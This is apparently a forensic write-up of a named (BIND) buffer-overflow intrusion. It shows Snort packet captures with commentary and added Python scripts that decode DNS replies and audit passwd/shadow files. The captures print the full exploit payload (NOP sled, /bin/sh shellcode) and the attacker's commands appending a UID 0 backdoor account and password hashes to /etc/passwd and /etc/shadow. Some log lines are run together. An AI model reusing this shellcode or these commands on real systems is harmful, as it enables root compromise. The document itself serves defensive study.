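    "41 52 50 41 00 00 02 00 01 00 01 51 80 00 06 03 6E 73 30 C0 47 C0 55 00 02 00 "
    "01 00 01 51 80 00 13 07 62 69 66 72 6F 73 74 08 73 65 61 73 74 72 6F 6D C0 50 "
    "C0 77 00 01 00 01 00 00 0E 10 00 04 CF E5 8F 03 C0 89 00 01 00 01 00 00 0E 10 "
    "00 04 C0 94 FC 0A"
)
# First 112 bytes of the TCP "answer" from 63.226.81.13 (after its 0x19C8 length
# prefix), truncated here; the rest of the real payload is the NOP sled and shellcode.
OVERFLOW_REPLY_HEAD = bytes.fromhex(
    "0C BC 84 00 00 01 00 01 00 00 00 01 01 72 08 72 73 61 76 69 6E 67 73 03 6E 65 "
    "74 00 00 01 00 01 01 72 08 72 73 61 76 69 6E 67 73 03 6E 65 74 00 00 01 00 01 "
    "00 00 01 2C 00 04 01 02 03 04 01 72 08 72 73 61 76 69 6E 67 73 03 6E 65 74 00 "
    "00 1E 00 01 00 00 01 2C 19 6B 00 06 61 64 6D 61 64 6D 00 00 90 90 90 90 90 90 "
    "90 90 90 90 90 90 90 90"
)

FLAG_BITS = {"qr": 15, "aa": 10, "tc": 9, "rd": 8, "ra": 7}


def read_name(msg, off, depth=0):
    """Decode a domain name at msg[off], following RFC 1035 compression pointers.
    Returns (name, offset just past the name at its original position)."""
    if depth > 8:
        raise ValueError("compression pointer loop")
    labels = []
    while True:
        if off >= len(msg):
            raise ValueError("name runs past end of message")
        n = msg[off]
        if n & 0xC0 == 0xC0:                       # pointer: 11xxxxxx xxxxxxxx
            if off + 1 >= len(msg):
                raise ValueError("truncated compression pointer")
            tail, _ = read_name(msg, ((n & 0x3F) << 8) | msg[off + 1], depth + 1)
            labels.append(tail)
            return ".".join(labels), off + 2
        off += 1
        if n == 0:
            return ".".join(labels), off
        labels.append(msg[off:off + n].decode("ascii", "replace"))
        off += n


def read_rr(msg, off):
    """Decode one resource record. An RDLENGTH larger than the bytes that
    remain is reported as oversized instead of being trusted."""
    name, off = read_name(msg, off)
    if off + 10 > len(msg):
        raise ValueError("truncated resource record header")
    rtype, rclass, ttl, rdlen = struct.unpack_from("!HHIH", msg, off)
    off += 10
    rr = {"name": name, "type": rtype, "ttl": ttl, "rdlength": rdlen,
          "available": len(msg) - off, "oversized": False, "text": None}
    if rdlen > rr["available"]:
        rr["oversized"] = True
        return rr, len(msg)
    if rtype == 1 and rdlen == 4:                  # A record: dotted quad
        rr["text"] = ".".join(str(b) for b in msg[off:off + 4])
    elif rtype in (2, 5, 12):                      # NS, CNAME, PTR carry a name
        rr["text"], _ = read_name(msg, off)
    else:
        rr["text"] = msg[off:off + rdlen].hex()
    return rr, off + rdlen


def parse_dns(msg):
    """Decode header flags, question and all RR sections; 'findings' lists
    what an analyst would want flagged (RA offered, oversized record)."""
    if len(msg) < 12:
        raise ValueError("shorter than a DNS header")
    ident, flags, qd, an, ns, ar = struct.unpack_from("!HHHHHH", msg, 0)
    out = {"id": ident, "flags": {k: bool((flags >> b) & 1) for k, b in FLAG_BITS.items()},
           "rcode": flags & 0xF, "question": None,
           "answer": [], "authority": [], "additional": [], "findings": []}
    if out["flags"]["qr"] and out["flags"]["ra"]:
        out["findings"].append("RA set: responder offers recursion to this client")
    off = 12
    for _ in range(qd):
        qname, off = read_name(msg, off)
        qtype, qclass = struct.unpack_from("!HH", msg, off)
        off += 4
        out["question"] = (qname, qtype, qclass)
    for section, count in (("answer", an), ("authority", ns), ("additional", ar)):
        for _ in range(count):
            rr, off = read_rr(msg, off)
            out[section].append(rr)
            if rr["oversized"]:
                out["findings"].append(
                    f"{section} RR {rr['name']} type {rr['type']} declares rdlength "
                    f"{rr['rdlength']} but only {rr['available']} bytes follow")
                return out                         # nothing after it can be trusted
    return out
```

Run against the reply, the decoder recovers the PTR answer (11.lspitz.soho.enteract.com), the two NS records and their glue, and flags RA; against the TCP payload it stops at the additional record of type 30 with rdlength 6507. A resolver that only serves its own zones should answer outside clients with RA clear, and that is the setting worth verifying on a public-facing named.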
---- COMMENT: Tickle Worked ----

The recursive lookup worked. Not only is our system running a vulnerable version of named, but it is recursive. The black-hat now queries our DNS server for the name r.rsavings.net. This is extremely odd: why would a remote system query my DNS server for a different domain name? As we will soon learn, this is how the exploit works. Our DNS server is being suckered. Read below as our DNS server recursively attempts to find the NS for rsavings.net so it can query the IP address (A record) of r.rsavings.net.

04/26-06:43:04.883506 213.28.22.189:1045 -> 172.16.1.107:53
UDP TTL:40 TOS:0x0 ID:18882
Len: 40
95 6B 01 00 00 01 00 00 00 00 00 00 01 72 08 72  .k...........r.r
73 61 76 69 6E 67 73 03 6E 65 74 00 00 01 00 01  savings.net.....

04/26-06:43:04.884189 172.16.1.107:1028 -> 198.41.0.21:53
UDP TTL:64 TOS:0x0 ID:18868
Len: 40
F7 F5 01 00 00 01 00 00 00 00 00 00 01 72 08 72  .............r.r
73 61 76 69 6E 67 73 03 6E 65 74 00 00 01 00 01  savings.net.....

04/26-06:43:04.969435 198.41.0.21:53 -> 172.16.1.107:1028
UDP TTL:244 TOS:0x0 ID:56421 DF
Len: 202
F7 F5 81 00 00 01 00 00 00 04 00 04 01 72 08 72  .............r.r
73 61 76 69 6E 67 73 03 6E 65 74 00 00 01 00 01  savings.net.....
08 52 53 41 56 49 4E 47 53 03 4E 45 54 00 00 02  .RSAVINGS.NET...
00 01 00 02 A3 00 00 12 03 4E 53 33 08 4D 59 44  .........NS3.MYD
4F 4D 41 49 4E 03 43 4F 4D 00 C0 20 00 02 00 01  OMAIN.COM.. ....
00 02 A3 00 00 06 03 4E 53 34 C0 3C C0 20 00 02  .......NS4.<. ..
00 01 00 02 A3 00 00 06 03 57 57 57 C0 20 C0 20  .........WWW. .
00 02 00 01 00 02 A3 00 00 08 05 53 45 52 56 32  ...........SERV2
C0 20 C0 38 00 01 00 01 00 02 A3 00 00 04 D8 22  . .8..........."
59 03 C0 56 00 01 00 01 00 02 A3 00 00 04 D8 22  Y..V..........."
59 04 C0 68 00 01 00 01 00 02 A3 00 00 04 3F E2  Y..h..........?.
51 0D C0 7A 00 01 00 01 00 02 A3 00 00 04 3F E2  Q..z..........?.
51 0C                                            Q.
04/26-06:43:04.970963 172.16.1.107:1028 -> 198.41.3.38:53 UDP TTL:64 TOS:0x0 ID:18869 Len: 42 C2 4E 00 00 00 01 00 00 00 00 00 00 03 4E 53 34 .N...........NS4 08 4D 59 44 4F 4D 41 49 4E 03 43 4F 4D 00 00 01 .MYDOMAIN.COM... 00 01 .. 04/26-06:43:04.971751 172.16.1.107:1028 -> 198.41.3.38:53 UDP TTL:64 TOS:0x0 ID:18870 Len: 42 F2 0B 00 00 00 01 00 00 00 00 00 00 03 4E 53 33 .............NS3 08 4D 59 44 4F 4D 41 49 4E 03 43 4F 4D 00 00 01 .MYDOMAIN.COM... 00 01 .. 04/26-06:43:04.972052 172.16.1.107:1028 -> 63.226.81.13:53 UDP TTL:64 TOS:0x0 ID:18871 Len: 40 0C BC 01 00 00 01 00 00 00 00 00 00 01 72 08 72 .............r.r 73 61 76 69 6E 67 73 03 6E 65 74 00 00 01 00 01 savings.net..... 04/26-06:43:05.063551 198.41.3.38:53 -> 172.16.1.107:1028 UDP TTL:242 TOS:0x0 ID:42903 DF Len: 202 C2 4E 80 00 00 01 00 01 00 04 00 04 03 4E 53 34 .N...........NS4 08 4D 59 44 4F 4D 41 49 4E 03 43 4F 4D 00 00 01 .MYDOMAIN.COM... 00 01 C0 0C 00 01 00 01 00 02 A3 00 00 04 D8 22 ..............." 59 04 08 4D 59 44 4F 4D 41 49 4E 03 43 4F 4D 00 Y..MYDOMAIN.COM. 00 02 00 01 00 02 A3 00 00 06 03 4E 53 31 C0 32 ...........NS1.2 C0 32 00 02 00 01 00 02 A3 00 00 06 03 4E 53 32 .2...........NS2 C0 32 C0 32 00 02 00 01 00 02 A3 00 00 06 03 4E .2.2...........N 53 33 C0 32 C0 32 00 02 00 01 00 02 A3 00 00 02 S3.2.2.......... C0 0C C0 4A 00 01 00 01 00 02 A3 00 00 04 D8 22 ...J..........." 59 01 C0 5C 00 01 00 01 00 02 A3 00 00 04 D8 22 Y..\..........." 59 02 C0 6E 00 01 00 01 00 02 A3 00 00 04 D8 22 Y..n..........." 59 03 C0 0C 00 01 00 01 00 02 A3 00 00 04 D8 22 Y.............." 59 04 Y. 04/26-06:43:05.065790 198.41.3.38:53 -> 172.16.1.107:1028 UDP TTL:242 TOS:0x0 ID:42904 DF Len: 202 F2 0B 80 00 00 01 00 01 00 04 00 04 03 4E 53 33 .............NS3 08 4D 59 44 4F 4D 41 49 4E 03 43 4F 4D 00 00 01 .MYDOMAIN.COM... 00 01 C0 0C 00 01 00 01 00 02 A3 00 00 04 D8 22 ..............." 59 03 08 4D 59 44 4F 4D 41 49 4E 03 43 4F 4D 00 Y..MYDOMAIN.COM. 
00 02 00 01 00 02 A3 00 00 06 03 4E 53 31 C0 32  ...........NS1.2
C0 32 00 02 00 01 00 02 A3 00 00 06 03 4E 53 32  .2...........NS2
C0 32 C0 32 00 02 00 01 00 02 A3 00 00 02 C0 0C  .2.2............
C0 32 00 02 00 01 00 02 A3 00 00 06 03 4E 53 34  .2...........NS4
C0 32 C0 4A 00 01 00 01 00 02 A3 00 00 04 D8 22  .2.J..........."
59 01 C0 5C 00 01 00 01 00 02 A3 00 00 04 D8 22  Y..\..........."
59 02 C0 0C 00 01 00 01 00 02 A3 00 00 04 D8 22  Y.............."
59 03 C0 7C 00 01 00 01 00 02 A3 00 00 04 D8 22  Y..|..........."
59 04                                            Y.

--- COMMENT: Buffer Overflow! ---

Our nameserver identifies the nameserver for rsavings.net, 63.226.81.13. Our simple UDP DNS request for r.rsavings.net should have resulted in a simple UDP reply containing an answer. However, we get a TCP connection instead, which is used for the buffer overflow attack. The following packets are the actual buffer overflow attack. Notice the '/bin/sh' executed at the end of the buffer overflow. That is the whole purpose of the exploit.

NOTE: Based on passive fingerprinting, another forensic tool, this system also appears to be a Linux box.

04/26-06:43:05.096725 63.226.81.13:1351 -> 172.16.1.107:53
TCP TTL:49 TOS:0x0 ID:26472 DF
**S***** Seq: 0x45B8E7 Ack: 0x0 Win: 0x7D78
TCP Options => MSS: 1460 SackOK TS: 4037587 0 NOP WS: 0

04/26-06:43:05.097443 172.16.1.107:53 -> 63.226.81.13:1351
TCP TTL:64 TOS:0x0 ID:18872 DF
**S***A* Seq: 0x3FA07873 Ack: 0x45B8E8 Win: 0x7D78
TCP Options => MSS: 1460 SackOK TS: 144023498 4037587 NOP WS: 0

04/26-06:43:05.204503 63.226.81.13:1351 -> 172.16.1.107:53
TCP TTL:50 TOS:0x0 ID:26473 DF
******A* Seq: 0x45B8E8 Ack: 0x3FA07874 Win: 0x7D78
TCP Options => NOP NOP TS: 4037599 144023498

04/26-06:43:05.205940 63.226.81.13:1351 -> 172.16.1.107:53
TCP TTL:50 TOS:0x0 ID:26474 DF
*****PA* Seq: 0x45B8E8 Ack: 0x3FA07874 Win: 0x7D78
TCP Options => NOP NOP TS: 4037599 144023498
19 C8                                            ..
04/26-06:43:05.206168 172.16.1.107:53 -> 63.226.81.13:1351 TCP TTL:64 TOS:0x0 ID:18873 DF ******A* Seq: 0x3FA07874 Ack: 0x45B8EA Win: 0x7D78 TCP Options => NOP NOP TS: 144023509 4037599 04/26-06:43:05.244101 63.226.81.13:1351 -> 172.16.1.107:53 TCP TTL:50 TOS:0x0 ID:26475 DF *****PA* Seq: 0x45B8EA Ack: 0x3FA07874 Win: 0x7D78 TCP Options => NOP NOP TS: 4037599 144023498 0C BC 84 00 00 01 00 01 00 00 00 01 01 72 08 72 .............r.r 73 61 76 69 6E 67 73 03 6E 65 74 00 00 01 00 01 savings.net..... 01 72 08 72 73 61 76 69 6E 67 73 03 6E 65 74 00 .r.rsavings.net. 00 01 00 01 00 00 01 2C 00 04 01 02 03 04 01 72 .......,.......r 08 72 73 61 76 69 6E 67 73 03 6E 65 74 00 00 1E .rsavings.net... 00 01 00 00 01 2C 19 6B 00 06 61 64 6D 61 64 6D .....,.k..admadm 00 00 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ ... repeated noops (0x90) removed for brevity sake --- 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 E9 AC ................ 01 00 00 5E 89 76 0C 8D 46 08 89 46 10 8D 46 2E ...^.v..F..F..F. 89 46 14 56 EB 54 5E 89 F3 B9 00 00 00 00 BA 00 .F.V.T^......... 00 00 00 B8 05 00 00 00 CD 80 50 8D 5E 02 B9 FF ..........P.^... 01 00 00 B8 27 00 00 00 CD 80 8D 5E 02 B8 3D 00 ....'......^..=. 00 00 CD 80 5B 53 B8 85 00 00 00 CD 80 5B B8 06 ....[S.......[.. 00 00 00 CD 80 8D 5E 0B B8 0C 00 00 00 CD 80 89 ......^......... F3 B8 3D 00 00 00 CD 80 EB 2C E8 A7 FF FF FF 2E ..=......,...... 00 41 44 4D 52 4F 43 4B 53 00 2E 2E 2F 2E 2E 2F .ADMROCKS.../../ 2E 2E 2F 2E 2E 2F 2E 2E 2F 2E 2E 2F 2E 2E 2F 2E ../../../../../. 2E 2F 2E 2E 2F 00 5E B8 02 00 00 00 CD 80 89 C0 ./../.^......... 85 C0 0F 85 8E 00 00 00 89 F3 8D 4E 0C 8D 56 18 ...........N..V. 
B8 0B 00 00 00 CD 80 B8 01 00 00 00 CD 80 E8 75 ...............u 00 00 00 10 00 00 00 00 00 00 00 74 68 69 73 69 ...........thisi 73 73 6F 6D 65 74 65 6D 70 73 70 61 63 65 66 6F ssometempspacefo 72 74 68 65 73 6F 63 6B 69 6E 61 64 64 72 69 6E rthesockinaddrin 79 65 61 68 79 65 61 68 69 6B 6E 6F 77 74 68 69 yeahyeahiknowthi 73 69 73 6C 61 6D 65 62 75 74 61 6E 79 77 61 79 sislamebutanyway 77 68 6F 63 61 72 65 73 68 6F 72 69 7A 6F 6E 67 whocareshorizong 6F 74 69 74 77 6F 72 6B 69 6E 67 73 6F 61 6C 6C otitworkingsoall 69 73 63 6F 6F 6C EB 86 5E 56 8D 46 08 50 8B 46 iscool..^V.F.P.F 04 50 FF 46 04 89 E1 BB 07 00 00 00 B8 66 00 00 .P.F.........f.. 00 CD 80 83 C4 0C 89 C0 85 C0 75 DA 66 83 7E 08 ..........u.f.~. 02 75 D3 8B 56 04 4A 52 89 D3 B9 00 00 00 00 B8 .u..V.JR........ 3F 00 00 00 CD 80 5A 52 89 D3 B9 01 00 00 00 B8 ?.....ZR........ 3F 00 00 00 CD 80 5A 52 89 D3 B9 02 00 00 00 B8 ?.....ZR........ 3F 00 00 00 CD 80 EB 12 5E 46 46 46 46 46 C7 46 ?.......^FFFFF.F 10 00 00 00 00 E9 FE FE FF FF E8 E9 FF FF FF E8 ................ 4F FE FF FF 2F 62 69 6E 2F 73 68 00 2D 63 00 FF O.../bin/sh.-c.. FF FF FF FF FF FF FF FF FF FF FF FF 00 00 00 00 ................ 70 6C 61 67 75 65 7A 5B 41 44 4D 5D 31 30 2F 39 plaguez[ADM]10/9 39 2D 65 78 69 74 00 90 90 90 90 90 90 90 90 90 9-exit.......... 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 C3 D6 FF BF C3 D6 FF BF ................ C3 D6 FF BF C3 D6 FF BF C3 D6 FF BF C3 D6 FF BF ................ 
C3 D6 FF BF C3 D6 FF BF C3 D6 FF BF C3 D6 FF BF  ................
C3 D6 FF BF C3 D6 FF BF C3 D6 FF BF C3 D6 FF BF  ................
C3 D6 FF BF C3 D6 FF BF C3 D6 FF BF C3 D6 FF BF  ................
C3 D6 FF BF C3 D6 FF BF 00 00 00 00 00 00 00 00  ................
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
00 00 00 00 00 00 00 00                          ........

--- COMMENT: The script ---

Now that the buffer overflow has been launched, we have a root shell. Something must be done with that root shell, so our black-hat runs the following commands in it. He first confirms the system architecture (uname -a) and the shell uid (id). He then inserts two accounts onto the system, twin and hantu.

04/26-06:43:05.483639 172.16.1.107:53 -> 63.226.81.13:1351
TCP TTL:64 TOS:0x0 ID:18876 DF
******A* Seq: 0x3FA07874 Ack: 0x45D2B2 Win: 0x7C70
TCP Options => NOP NOP TS: 144023537 4037617

04/26-06:43:06.219868 63.226.81.13:1351 -> 172.16.1.107:53
TCP TTL:50 TOS:0x0 ID:26480 DF
*****PA* Seq: 0x45D2B2 Ack: 0x3FA07874 Win: 0x7D78
TCP Options => NOP NOP TS: 4037700 144023537
63 64 20 2F 3B 20 75 6E 61 6D 65 20 2D 61 3B 20  cd /; uname -a;
70 77 64 3B 20 69 64 3B 0A                       pwd; id;.

04/26-06:43:06.233691 172.16.1.107:53 -> 63.226.81.13:1351
TCP TTL:64 TOS:0x0 ID:18877 DF
******A* Seq: 0x3FA07874 Ack: 0x45D2CB Win: 0x7C70
TCP Options => NOP NOP TS: 144023612 4037700

04/26-06:43:06.236460 172.16.1.107:53 -> 63.226.81.13:1351
TCP TTL:64 TOS:0x0 ID:18878 DF
*****PA* Seq: 0x3FA07874 Ack: 0x45D2CB Win: 0x7C70
TCP Options => NOP NOP TS: 144023612 4037700
4C 69 6E 75 78 20 61 70 6F 6C 6C 6F 2E 75 69 63  Linux apollo.uic
6D 62 61 2E 65 64 75 20 32 2E 32 2E 35 2D 31 35  mba.edu 2.2.5-15
20 23 31 20 4D 6F 6E 20 41 70 72 20 31 39 20 32   #1 Mon Apr 19 2
32 3A 32 31 3A 30 39 20 45 44 54 20 31 39 39 39  2:21:09 EDT 1999
20 69 35 38 36 20 75 6E 6B 6E 6F 77 6E 0A         i586 unknown.

04/26-06:43:06.346489 63.226.81.13:1351 -> 172.16.1.107:53
TCP TTL:50 TOS:0x0 ID:26482 DF
******A* Seq: 0x45D2CB Ack: 0x3FA078C2 Win: 0x7D78
TCP Options => NOP NOP TS: 4037713 144023612

04/26-06:43:06.346819 172.16.1.107:53 -> 63.226.81.13:1351
TCP TTL:64 TOS:0x0 ID:18879 DF
*****PA* Seq: 0x3FA078C2 Ack: 0x45D2CB Win: 0x7C70
TCP Options => NOP NOP TS: 144023623 4037713
2F 0A 75 69 64 3D 30 28 72 6F 6F 74 29 20 67 69  /.uid=0(root) gi
64 3D 30 28 72 6F 6F 74 29 20 67 72 6F 75 70 73  d=0(root) groups
3D 30 28 72 6F 6F 74 29 2C 31 28 62 69 6E 29 2C  =0(root),1(bin),
32 28 64 61 65 6D 6F 6E 29 2C 33 28 73 79 73 29  2(daemon),3(sys)
2C 34 28 61 64 6D 29 2C 36 28 64 69 73 6B 29 2C  ,4(adm),6(disk),
31 30 28 77 68 65 65 6C 29 0A                    10(wheel).

04/26-06:43:06.486257 63.226.81.13:1351 -> 172.16.1.107:53
TCP TTL:50 TOS:0x0 ID:26483 DF
******A* Seq: 0x45D2CB Ack: 0x3FA0791C Win: 0x7D78
TCP Options => NOP NOP TS: 4037727 144023623

04/26-06:43:09.880779 213.28.22.189:1045 -> 172.16.1.107:53
UDP TTL:40 TOS:0x0 ID:18907
Len: 40
95 6B 01 00 00 01 00 00 00 00 00 00 01 72 08 72  .k...........r.r
73 61 76 69 6E 67 73 03 6E 65 74 00 00 01 00 01  savings.net.....

04/26-06:43:19.875096 213.28.22.189:1045 -> 172.16.1.107:53
UDP TTL:40 TOS:0x0 ID:18941
Len: 40
95 6B 01 00 00 01 00 00 00 00 00 00 01 72 08 72  .k...........r.r
73 61 76 69 6E 67 73 03 6E 65 74 00 00 01 00 01  savings.net.....

04/26-06:43:39.856657 213.28.22.189:1045 -> 172.16.1.107:53
UDP TTL:40 TOS:0x0 ID:19019
Len: 40
95 6B 01 00 00 01 00 00 00 00 00 00 01 72 08 72  .k...........r.r
73 61 76 69 6E 67 73 03 6E 65 74 00 00 01 00 01  savings.net.....
04/26-06:44:00.432457 63.226.81.13:1351 -> 172.16.1.107:53
TCP TTL:50 TOS:0x0 ID:26498 DF
*****PA* Seq: 0x45D2CB Ack: 0x3FA0791C Win: 0x7D78
TCP Options => NOP NOP TS: 4043120 144023623
65 63 68 6F 20 22 74 77 69 6E 3A 3A 35 30 36 3A  echo "twin::506:
35 30 36 3A 3A 2F 68 6F 6D 65 2F 74 77 69 6E 3A  506::/home/twin:
2F 62 69 6E 2F 62 61 73 68 22 20 3E 3E 20 2F 65  /bin/bash" >> /e
74 63 2F 70 61 73 73 77 64 0A                    tc/passwd.

04/26-06:44:00.448249 172.16.1.107:53 -> 63.226.81.13:1351
TCP TTL:64 TOS:0x0 ID:18892 DF
******A* Seq: 0x3FA0791C Ack: 0x45D305 Win: 0x7C70
TCP Options => NOP NOP TS: 144029033 4043120

04/26-06:44:00.562329 63.226.81.13:1351 -> 172.16.1.107:53
TCP TTL:50 TOS:0x0 ID:26499 DF
*****PA* Seq: 0x45D305 Ack: 0x3FA0791C Win: 0x7D78
TCP Options => NOP NOP TS: 4043134 144029033
65 63 68 6F 20 22 74 77 69 6E 3A 77 33 6E 54 32  echo "twin:w3nT2
48 30 62 36 41 6A 4D 32 3A 3A 3A 3A 3A 3A 3A 22  H0b6AjM2:::::::"
20 3E 3E 20 2F 65 74 63 2F 73 68 61 64 6F 77 0A   >> /etc/shadow.
0A                                               .

04/26-06:44:00.578252 172.16.1.107:53 -> 63.226.81.13:1351
TCP TTL:64 TOS:0x0 ID:18893 DF
******A* Seq: 0x3FA0791C Ack: 0x45D336 Win: 0x7C70
TCP Options => NOP NOP TS: 144029046 4043134

04/26-06:44:03.647436 63.226.81.13:1351 -> 172.16.1.107:53
TCP TTL:50 TOS:0x0 ID:26501 DF
*****PA* Seq: 0x45D336 Ack: 0x3FA0791C Win: 0x7D78
TCP Options => NOP NOP TS: 4043443 144029046
0A                                               .

04/26-06:44:03.658554 172.16.1.107:53 -> 63.226.81.13:1351
TCP TTL:64 TOS:0x0 ID:18894 DF
******A* Seq: 0x3FA0791C Ack: 0x45D337 Win: 0x7C70
TCP Options => NOP NOP TS: 144029354 4043443

04/26-06:44:04.699420 63.226.81.13:1351 -> 172.16.1.107:53
TCP TTL:50 TOS:0x0 ID:26502 DF
*****PA* Seq: 0x45D337 Ack: 0x3FA0791C Win: 0x7D78
TCP Options => NOP NOP TS: 4043548 144029354
65 63 68 6F 20 22 68 61 6E 74 75 3A 3A 30 3A 30  echo "hantu::0:0
3A 3A 2F 3A 2F 62 69 6E 2F 62 61 73 68 22 20 3E  ::/:/bin/bash" >
3E 20 2F 65 74 63 2F 70 61 73 73 77 64 0A        > /etc/passwd.

04/26-06:44:04.718625 172.16.1.107:53 -> 63.226.81.13:1351
TCP TTL:64 TOS:0x0 ID:18895 DF
******A* Seq: 0x3FA0791C Ack: 0x45D365 Win: 0x7C70
TCP Options => NOP NOP TS: 144029460 4043548

04/26-06:44:04.829064 63.226.81.13:1351 -> 172.16.1.107:53
TCP TTL:50 TOS:0x0 ID:26504 DF
*****PA* Seq: 0x45D365 Ack: 0x3FA0791C Win: 0x7D78
TCP Options => NOP NOP TS: 4043561 144029460
65 63 68 6F 20 22 68 61 6E 74 75 3A 77 33 6E 54  echo "hantu:w3nT
32 48 30 62 36 41 6A 4D 32 3A 3A 3A 3A 3A 3A 3A  2H0b6AjM2:::::::
22 20 3E 3E 20 2F 65 74 63 2F 73 68 61 64 6F 77  " >> /etc/shadow
0A 0A 0A

04/26-06:44:04.848620 172.16.1.107:53 -> 63.226.81.13:1351
TCP TTL:64 TOS:0x0 ID:18896 DF
******A* Seq: 0x3FA0791C Ack: 0x45D398 Win: 0x7C70
TCP Options => NOP NOP TS: 144029473 4043561

04/26-06:46:21.055744 63.226.81.13:1351 -> 172.16.1.107:53
TCP TTL:50 TOS:0x0 ID:26540 DF
***F**A* Seq: 0x45D398 Ack: 0x3FA0791C Win: 0x7D78
TCP Options => NOP NOP TS: 4057184 144029473

04/26-06:46:21.055951 172.16.1.107:53 -> 63.226.81.13:1351
TCP TTL:64 TOS:0x0 ID:18974 DF
******A* Seq: 0x3FA0791C Ack: 0x45D399 Win: 0x7C70
TCP Options => NOP NOP TS: 144043092 4057184

04/26-06:46:21.056696 172.16.1.107:53 -> 63.226.81.13:1351
TCP TTL:64 TOS:0x0 ID:18975 DF
***F**A* Seq: 0x3FA0791C Ack: 0x45D399 Win: 0x7C70
TCP Options => NOP NOP TS: 144043092 4057184

04/26-06:46:21.167231 63.226.81.13:1351 -> 172.16.1.107:53
TCP TTL:50 TOS:0x0 ID:26542 DF
******A* Seq: 0x45D399 Ack: 0x3FA0791D Win: 0x7D78
TCP Options => NOP NOP TS: 4057196 144043092

Exiting...
===============================================================================
Snort processed 59 packets.
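The two echo appends in the session above are the whole persistence step, and they leave fingerprints that can be checked offline against a known-good copy of /etc/passwd, which is what the forensic comparison in this write-up amounts to. The audit script below is an added example, not Honeynet Project code. Its baseline and "found" files are constructed; the twin and hantu lines are the ones from the trace. It reports accounts absent from the baseline, non-root UID 0 accounts, empty password fields in passwd (which classic login treats as "no password required"), passwd entries with no shadow entry, shadow entries that share one hash, and 13-character DES-crypt hashes.

```python
from collections import defaultdict
from dataclasses import dataclass

# Constructed sample files.  BASELINE_* is what a clean install looked like;
# FOUND_* is the same plus the two accounts appended in the captured session.
BASELINE_PASSWD = """root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:
daemon:x:2:2:daemon:/sbin:
named:x:25:25:Named:/var/named:/bin/false
"""
BASELINE_SHADOW = """root:$1$constructed$notarealhash:11000:0:99999:7:::
bin:*:11000:0:99999:7:::
daemon:*:11000:0:99999:7:::
named:!!:11000:0:99999:7:::
"""
FOUND_PASSWD = BASELINE_PASSWD + """twin::506:506::/home/twin:/bin/bash
hantu::0:0::/:/bin/bash
"""
FOUND_SHADOW = BASELINE_SHADOW + """twin:w3nT2H0b6AjM2:::::::
hantu:w3nT2H0b6AjM2:::::::
"""


@dataclass(frozen=True)
class Finding:
    kind: str      # short tag, e.g. "added", "uid0", "shared-hash"
    account: str
    detail: str


def parse_colon_file(text, nfields):
    """Parse passwd/shadow-style text into {name: fields}; lines with the wrong
    field count are returned separately instead of being silently dropped."""
    entries, malformed = {}, []
    for lineno, line in enumerate(text.splitlines(), 1):
        if not line.strip() or line.startswith("#"):
            continue
        fields = line.split(":")
        if len(fields) != nfields:
            malformed.append((lineno, line))
            continue
        entries[fields[0]] = fields
    return entries, malformed


def audit(baseline_passwd, passwd, shadow):
    """Compare the current passwd/shadow against a known-good passwd baseline."""
    findings = []
    base, _ = parse_colon_file(baseline_passwd, 7)
    cur, bad_pw = parse_colon_file(passwd, 7)
    shd, bad_sh = parse_colon_file(shadow, 9)
    for lineno, line in bad_pw:
        findings.append(Finding("malformed", "?", f"passwd line {lineno}: {line!r}"))
    for lineno, line in bad_sh:
        findings.append(Finding("malformed", "?", f"shadow line {lineno}: {line!r}"))
    for name, f in cur.items():
        if name not in base:
            findings.append(Finding("added", name, f"not in baseline (uid {f[2]}, shell {f[6]})"))
        if f[2] == "0" and name != "root":
            findings.append(Finding("uid0", name, "uid 0 but not root"))
        if f[1] == "":
            findings.append(Finding("empty-passwd", name, "empty password field in passwd"))
        if name not in shd:
            findings.append(Finding("no-shadow", name, "passwd entry without shadow entry"))
    for name in base:
        if name not in cur:
            findings.append(Finding("removed", name, "in baseline but missing now"))
    by_hash = defaultdict(list)
    for name, f in shd.items():
        h = f[1]
        if h == "":
            findings.append(Finding("empty-shadow", name, "empty hash: no password required"))
        if h in ("", "*") or h.startswith("!"):   # locked or passwordless, no hash to compare
            continue
        by_hash[h].append(name)
        if len(h) == 13 and not h.startswith("$"):
            findings.append(Finding("legacy-hash", name, "13-character DES-crypt hash"))
    for names in by_hash.values():
        if len(names) > 1:
            for name in names:
                others = ", ".join(n for n in names if n != name)
                findings.append(Finding("shared-hash", name, f"same hash as {others}"))
    return findings


if __name__ == "__main__":
    for f in audit(BASELINE_PASSWD, FOUND_PASSWD, FOUND_SHADOW):
        print(f"{f.kind:13} {f.account:8} {f.detail}")
```

On the constructed files the clean baseline audits to nothing, while the post-intrusion copy yields twin as added with an empty passwd field, hantu as an added UID 0 account, and both sharing a single DES-crypt hash: the same conclusions the analyst reached by hand from the packet capture, but reproducible from the filesystem image alone.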
Breakdown by protocol: TCP: 33 (55.932%) UDP: 26 (44.068%) ICMP: 0 (0.000%) ARP: 0 (0.000%) IPv6: 0 (0.000%) IPX: 0 (0.000%) OTHER: 0 (0.000%) =============================================================================== EoF Additional analysis Know your enemy #3: Forensics ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ # # I will be posting other people's observations on # this page. If you have anything you would like to # add, email Lance Spitzner # Contributed by verin 1. NUS = National University of Singapore. homepage is www.nus.edu.sg 2. 137.132.216.35 = this looks like a home account given to students ( unknown faculty ) 3. 137.132.17.202 = Looks like a labatory computer, library computer, Lecturer's computer, Not a server. ( could be a server. but it'd be an internal one and heavily firewalled. ) 4. [root@apollo /]# nslookup magix : Magix is an ADSL Internet Service Provided by Singtel ( Singapore Telecommunications Ltd.)Attacker 